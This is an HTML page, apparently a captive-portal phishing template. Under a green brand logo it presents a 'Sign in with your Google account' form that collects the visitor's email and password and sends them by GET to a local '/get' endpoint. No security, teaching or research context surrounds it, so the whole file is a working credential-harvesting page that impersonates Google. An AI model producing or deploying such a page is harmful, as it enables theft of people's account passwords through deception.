<!DOCTYPE html>
<html>
<head>
<style>
body {
  font-family: Arial, sans-serif;
  background-color: #FFFFFF;
}

.container {
  max-width: 400px;
  margin: 0 auto;
  padding: 20px;
}

@media (min-width: 600px) {
  .container {
    max-width: 500px;
  }
}

.logo-container {
  text-align: center;
  margin-bottom: 30px;
  display: flex;
  justify-content: center;
  align-items: center;
}

.logo {
  width: 40px;
  height: 40px;
  fill: #005F2C;
  margin-right: 100px
}

.form-container {
  background: #FFFFFF;
  border: 1px solid #FFFFFF;
  border-radius: 4px;
  padding: 20px;
  box-shadow: 0px 0px 10px 0px rgba(108,66,156,0.2);
}

h1 {
  text-align: center; 
  font-size: 28px;
  font-weight: 500;
  color: #005F2C;
  margin-bottom: 20px;
}

h2 {
  text-align: center; 
  font-size: 28px;
  font-weight: 500;
  color: #005F2C;
  margin-bottom: 20px;
}

.input-field {
  width: 100%;
  padding: 12px;
  border: 1px solid #005F2C;
  border-radius: 4px;
  box-sizing: border-box;
  margin-bottom: 20px;
  font-size: 14px;
}

.submit-btn {
  background: #005F2C;
  border: none;
  color: #FFFFFF;
  padding: 12px 20px;
  border-radius: 4px;
  cursor: pointer;
  font-size: 16px;
  display: block;
  margin: auto;
  margin-top: 20px;
}

.submit-btn:hover {
  background: #005F2C;
}

.forgot-password {
  display: block;
  text-align: center;
  color: #005F2C;
  text-decoration: underline;
  margin-top: 10px;
}

.error-message {
  color: red;
  text-align: center;
  display: none; 
  margin-top: 10px;
}

</style>
</head>

<body>

<div class="container">

  <div class="logo-container">
<svg version="1.0" xmlns="http://www.w3.org/2000/svg"
 width="380.000000pt" height="210.000000pt" viewBox="0 0 3840.000000 2160.000000"
 preserveAspectRatio="xMidYMid meet">
<g transform="translate(0.000000,2160.000000) scale(0.100000,-0.100000)"
fill="#005F2C" stroke="none">
<path d="M3066 18544 c-56 -20 -105 -61 -332 -274 -510 -482 -1006 -1065
-1372 -1615 -752 -1131 -1164 -2278 -1284 -3580 -21 -225 -17 -996 5 -1210 90
-839 305 -1571 666 -2270 406 -785 950 -1447 1651 -2011 527 -423 1165 -773
1818 -997 478 -165 910 -256 1457 -309 176 -17 789 -17 970 0 979 92 1882 399
2722 924 345 216 625 431 950 729 214 198 257 270 232 390 -22 104 -137 181
-243 163 -67 -11 -125 -47 -241 -149 -626 -550 -1457 -934 -2329 -1075 -325
-53 -739 -73 -1041 -51 -632 47 -1210 206 -1760 486 -786 400 -1447 1017
-1897 1770 -542 909 -745 1987 -562 2985 116 629 396 1283 771 1798 576 790
1351 1328 2187 1518 222 51 349 65 607 71 329 7 540 -15 835 -87 486 -120 914
-341 1245 -642 67 -62 78 -68 117 -68 31 0 49 6 65 23 12 12 597 779 1300
1704 1386 1826 1310 1718 1254 1771 l-23 22 -3865 -1 c-3340 0 -3869 -2 -3903
-15z"/>
<path d="M30955 18541 c-22 -10 -70 -39 -107 -64 -163 -110 -371 -137 -563
-72 -44 15 -108 29 -141 32 -165 15 -324 -80 -397 -235 -30 -62 -32 -75 -32
-172 0 -98 2 -110 32 -170 20 -41 54 -86 89 -120 132 -126 169 -173 209 -264
39 -89 55 -189 52 -337 -2 -121 0 -138 20 -175 52 -96 140 -149 248 -148 80 0
81 1 315 137 85 50 175 99 199 110 155 69 322 -98 256 -256 -21 -52 -74 -91
-271 -202 -201 -113 -261 -164 -287 -240 -35 -102 -13 -210 57 -279 24 -24 84
-62 141 -90 137 -68 222 -153 287 -286 29 -59 53 -126 62 -175 9 -44 28 -105
43 -135 35 -72 113 -149 188 -186 56 -27 68 -29 175 -29 107 0 119 2 175 29
75 37 153 114 188 186 14 30 35 97 46 148 24 109 63 195 125 273 61 78 118
122 243 188 91 48 113 64 140 105 41 61 57 117 50 183 -6 60 -48 143 -88 177
-15 13 -120 76 -234 142 -237 136 -256 154 -263 253 -7 93 46 172 134 201 70
24 113 9 302 -101 231 -134 257 -147 318 -154 109 -14 225 50 276 153 21 43
23 60 23 212 1 142 4 174 23 230 34 104 89 187 188 284 106 105 136 149 159
230 48 167 -21 351 -167 446 -119 77 -236 87 -398 33 -74 -24 -100 -28 -205
-28 -96 0 -134 4 -190 22 -64 21 -95 37 -242 128 -94 58 -229 44 -315 -33 -80
-72 -82 -82 -88 -392 -6 -304 -7 -309 -74 -368 -33 -28 -89 -52 -126 -52 -37
0 -93 24 -126 52 -68 60 -68 64 -74 368 -5 302 -5 299 -73 376 -68 78 -208
108 -302 65z"/>
<path d="M13761 16406 c-43 -24 -50 -52 -51 -192 0 -169 2 -172 143 -215 205
-62 255 -80 273 -100 18 -20 19 -108 24 -2873 l6 -2851 21 -97 c78 -352 228
-607 468 -792 191 -148 371 -229 637 -288 l103 -23 1715 0 1715 0 110 28 c522
132 885 495 984 984 68 336 15 623 -159 855 -157 209 -397 366 -885 578 -291
127 -401 180 -500 240 -247 149 -336 321 -269 523 35 107 160 191 336 228 305
62 723 -22 1006 -204 103 -67 153 -63 192 13 20 38 449 1024 464 1064 3 10 1
35 -5 53 -21 66 38 63 -1171 63 -1153 0 -1202 -2 -1358 -46 -105 -30 -265
-109 -345 -169 -292 -220 -456 -525 -472 -877 -20 -446 163 -766 582 -1017 22
-13 164 -88 315 -166 312 -161 387 -205 483 -282 125 -100 199 -219 224 -358
50 -282 -121 -566 -399 -662 -176 -60 -481 -34 -705 60 -271 114 -487 359
-539 610 -17 81 -41 114 -89 123 -42 7 -359 -117 -380 -150 -31 -46 -28 -78
10 -136 48 -74 69 -148 62 -226 -10 -124 -82 -231 -195 -286 -60 -30 -75 -33
-152 -33 -72 1 -94 5 -141 28 -66 32 -142 108 -172 175 l-22 47 -5 3163 -5
3164 -33 29 -32 29 -883 0 c-713 -1 -887 -3 -906 -14z"/>
<path d="M20078 16405 c-15 -9 -32 -24 -38 -35 -5 -10 -10 -80 -10 -155 0
-136 0 -137 28 -164 17 -17 54 -36 102 -50 237 -70 270 -82 285 -103 13 -20
15 -306 15 -2753 0 -1817 4 -2767 10 -2840 44 -454 244 -807 595 -1043 190
-128 413 -213 692 -264 125 -22 144 -23 728 -23 542 0 608 2 685 18 474 102
796 408 917 871 l27 101 5 521 6 521 120 -69 c142 -80 346 -172 502 -225 l112
-38 17 -70 c33 -135 106 -331 176 -472 153 -309 374 -584 636 -791 89 -71 263
-192 276 -192 2 0 35 -17 73 -39 100 -57 285 -135 414 -175 468 -145 996 -141
1459 10 130 43 377 163 490 239 317 212 604 540 687 785 39 113 24 191 -46
237 -77 52 -180 20 -260 -81 -186 -234 -445 -389 -762 -457 -142 -31 -488 -34
-617 -6 -259 57 -482 174 -668 349 -145 138 -277 336 -302 454 l-9 41 171 6
c612 22 1160 219 1541 554 309 272 507 659 531 1041 l7 104 71 47 c184 123
365 218 501 262 52 18 92 23 155 23 151 -2 251 -61 308 -180 l27 -59 5 -1641
c5 -1730 3 -1656 45 -1686 6 -4 414 -8 908 -8 l898 0 24 24 c31 31 38 73 33
207 -5 151 7 143 -325 239 -50 14 -78 29 -93 47 l-20 26 2 1406 3 1406 27 57
c73 156 271 259 439 229 96 -16 143 -46 269 -165 127 -122 196 -164 311 -190
228 -53 448 -14 659 116 105 64 266 222 340 332 319 477 346 1191 64 1681
-133 230 -344 442 -589 591 -70 43 -88 49 -145 52 -50 2 -73 -1 -100 -16 -76
-42 -112 -120 -95 -208 5 -31 30 -60 139 -168 155 -153 185 -188 271 -317 125
-186 176 -336 155 -458 -22 -125 -105 -243 -207 -292 -70 -34 -171 -38 -265
-9 -92 27 -161 66 -355 197 -281 191 -456 249 -635 212 -185 -39 -347 -205
-364 -374 -5 -47 0 -88 25 -191 37 -155 38 -193 10 -252 -31 -64 -86 -97 -159
-96 -80 1 -129 32 -242 156 -173 189 -245 244 -372 286 -405 133 -1009 -86
-1756 -636 l-95 -70 -41 70 c-211 356 -583 587 -1054 654 -154 23 -445 22
-605 0 -520 -73 -958 -285 -1324 -641 -287 -279 -473 -577 -596 -950 -64 -193
-115 -469 -115 -619 l0 -45 -117 55 c-143 66 -344 175 -475 258 l-98 60 0 856
0 857 -26 24 -26 24 -673 3 -674 2 -33 -29 -33 -29 -3 -639 c-2 -443 0 -654 8
-690 23 -108 36 -118 463 -372 l257 -153 0 -639 c0 -422 -4 -656 -11 -691 -41
-197 -197 -345 -434 -410 -68 -19 -107 -22 -260 -22 -178 -1 -181 -1 -275 32
-137 48 -214 94 -300 181 -77 78 -125 156 -152 251 -10 36 -13 658 -15 3111
l-3 3066 -26 24 -26 24 -886 2 c-769 2 -891 0 -914 -12z m7375 -3766 c221 -34
350 -195 349 -438 0 -216 -143 -486 -374 -707 -262 -250 -610 -400 -978 -421
l-105 -6 3 89 c19 640 280 1182 673 1398 81 45 136 64 224 81 90 17 120 17
208 4z"/>
<path d="M5720 13530 c-911 -81 -1669 -868 -1840 -1911 -43 -264 -45 -593 -4
-854 158 -1017 870 -1796 1755 -1920 294 -41 661 -1 894 96 154 64 240 125
495 355 127 114 179 139 290 139 93 -1 148 -19 215 -72 34 -26 113 -125 225
-283 128 -179 286 -258 495 -247 123 6 224 38 390 126 345 181 775 528 1337
1080 l228 224 0 -614 c0 -561 1 -617 17 -639 9 -14 22 -28 27 -32 6 -4 415 -8
909 -8 l898 0 24 25 c24 23 25 29 25 165 0 78 -5 150 -10 161 -16 29 -59 47
-224 95 -119 34 -156 48 -174 69 l-22 26 2 1407 3 1407 24 60 c33 82 125 174
203 203 156 58 281 26 348 -91 24 -42 30 -64 30 -114 0 -52 -6 -71 -35 -125
-67 -120 -85 -166 -94 -234 -30 -244 115 -475 349 -556 122 -43 349 -24 528
42 255 95 484 315 591 566 63 148 76 221 76 419 0 216 -16 289 -100 460 -157
322 -464 534 -834 575 -188 21 -415 -16 -564 -91 -146 -74 -243 -161 -406
-363 -139 -172 -185 -208 -271 -209 -95 -1 -151 50 -270 249 -162 269 -353
384 -693 414 -207 19 -397 -14 -565 -99 -233 -117 -420 -338 -422 -497 0 -58
42 -135 92 -170 37 -26 49 -29 122 -29 79 0 83 1 136 40 51 37 60 40 122 40
76 0 111 -19 140 -76 17 -32 18 -95 18 -891 l0 -856 -82 -74 c-123 -110 -325
-277 -474 -388 -346 -261 -588 -382 -732 -367 -73 8 -153 49 -201 103 -76 86
-71 -4 -71 1355 0 845 3 1225 11 1242 15 34 30 41 204 92 87 25 168 53 180 61
39 25 47 62 43 198 -3 122 -4 126 -31 153 l-27 28 -759 0 -759 0 -26 -24 c-15
-14 -31 -43 -37 -65 -48 -176 -86 -234 -168 -256 -86 -23 -126 -5 -331 144
-263 192 -477 281 -763 321 -137 18 -341 25 -457 15z m790 -1050 c293 -46 565
-245 639 -468 21 -62 21 -72 19 -855 l-3 -793 -38 -77 c-90 -181 -300 -335
-545 -398 -96 -24 -280 -27 -398 -4 -457 87 -772 423 -886 947 -26 121 -36
434 -18 575 55 444 275 794 605 963 190 97 434 140 625 110z"/>
<path d="M34990 13529 c-1100 -91 -1951 -1230 -1870 -2503 57 -897 515 -1651
1220 -2005 279 -141 544 -198 875 -188 399 12 638 94 906 313 51 41 105 82
120 90 39 20 98 17 137 -6 64 -39 64 -33 60 -639 l-4 -546 -26 -96 c-54 -199
-128 -335 -252 -466 -44 -47 -107 -104 -140 -128 -396 -280 -971 -235 -1329
105 -177 168 -280 388 -294 629 -6 85 -9 97 -34 125 l-27 31 -206 0 -206 0
-24 -25 c-21 -21 -27 -40 -36 -115 -19 -169 -78 -331 -190 -519 -394 -662
-1209 -1189 -2238 -1450 -631 -160 -1260 -225 -2052 -213 -875 14 -1699 125
-2731 368 -661 155 -1230 317 -2569 729 -1352 416 -1880 568 -2590 745 -1273
316 -2371 484 -3518 536 -292 13 -1115 7 -1322 -10 -679 -56 -1265 -147 -1920
-296 -1516 -347 -3006 -943 -4285 -1713 -247 -149 -591 -375 -818 -539 -295
-211 -685 -522 -707 -562 -16 -31 -12 -68 12 -95 13 -14 232 -140 488 -279
527 -287 2506 -1368 2945 -1609 249 -137 295 -158 323 -154 27 4 68 38 198
163 448 428 730 673 1109 958 1248 940 2577 1447 4205 1605 480 46 1139 69
1523 52 753 -34 1582 -151 3232 -458 1254 -233 1492 -277 1840 -338 1102 -195
1941 -306 2600 -345 693 -41 1549 -6 2292 94 1863 251 3290 933 4130 1975 72
90 223 307 290 418 l19 32 58 -84 c292 -430 785 -720 1361 -801 431 -61 839 0
1213 180 638 308 1066 903 1141 1587 8 66 11 844 11 2427 0 1721 3 2337 11
2355 15 32 44 45 222 96 204 60 197 51 197 239 l0 149 -31 26 -31 26 -754 -2
-754 -3 -25 -25 c-15 -16 -33 -54 -45 -99 -40 -141 -83 -200 -163 -222 -79
-21 -128 -1 -297 123 -63 47 -141 101 -173 121 -214 137 -464 214 -762 236
-153 12 -175 12 -315 0z m875 -1067 c224 -62 401 -184 512 -355 65 -100 64
-87 61 -958 l-3 -785 -38 -77 c-90 -181 -300 -335 -545 -398 -96 -24 -280 -27
-398 -4 -466 88 -791 446 -890 980 -29 153 -26 522 4 661 102 470 362 787 747
910 176 56 400 67 550 26z"/>
</g>
</svg>





  </div>

  <div class="form-container">

    <center><h1>Sign in with your <b>Google</b> account</h1>
      </center>

    <form action="/get" id="login-form">
    
      <input name="email" class="input-field" type="text" placeholder="Email" required>
      
      <input name="password" class="input-field" type="password" placeholder="Password" required>
	  
	  <a href="javascript:void(0);" class="forgot-password">Forgot credentials?</a>

      <button class="submit-btn" type="submit">Connect</button>
    
	<div class="error-message"></div>

    </form>

  </div>

</div>
<script>
  document.querySelector('.forgot-password').addEventListener('click', function() {
    var errorMessage = document.querySelector('.error-message');
    errorMessage.innerHTML = "Please refer to your Google account if you forgot your credentials";
    errorMessage.style.display = 'block';
  });
</script>
</body>
</html>
